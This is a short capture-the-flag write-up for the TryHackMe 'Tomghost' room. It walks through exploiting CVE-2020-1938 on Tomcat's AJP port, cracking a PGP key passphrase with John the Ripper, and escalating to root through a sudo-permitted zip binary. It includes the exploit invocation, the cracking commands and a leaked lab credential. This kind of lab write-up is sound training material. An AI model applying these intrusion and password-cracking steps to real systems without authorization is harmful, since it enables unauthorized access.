# # Tomghost-TryHackMe >This is a writeup for THM box - # Tomghost >https://tryhackme.com/room/tomghost > >  > > > `Difficulty: Easy` > > `Task 1 ` > > > 1. Compromise this machine and obtain `user.txt` > > 2. Escalate privileges and obtain `root.txt` > --- ## Solution ### nmap > running nmap >  > > > i found multiple services open > going by the name of the chall i went to check `Tomcat` > --- ### Tomcat > searching for exploits on `tomcat 9.0.30` i found [CVE-2020-1938](https://www.exploit-db.com/exploits/48143) > using the exploit > ```bash > $ python 48143.py -p 8009 10.10.129.37 > ``` > >  > > > > we found the ssh credential for `skyfuck` > --- ### skyfuck > i ssh into the box with the creds found >  > > and found two files `credential.pgp tryhackme.asc` > we can decrypt them as explained [here](https://superuser.com/questions/46461/decrypt-pgp-file-using-asc-key) > but it turns out i need passphrase > >  > > so i cracked it with john > ```bash > $ gpg2john tryhackme.asc >hash.txt > $ john hash.txt -w=/usr/share/wordlists/rockyou.txt.gz > ``` > >  > > > entering `alexandru` as passphrase we get the ssh creds for merlin > ```js > gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences > gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 > "tryhackme <stuxnet@tryhackme.com>" > merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123js > ``` > --- ### merlin > sshing as merlin and checking `sudo` > >  > > i found that `/usr/bin/zip` was allowed > using [gtfobins](https://gtfobins.github.io/) i got the root shell > >  > > Hence the box is rooted `:]` > ---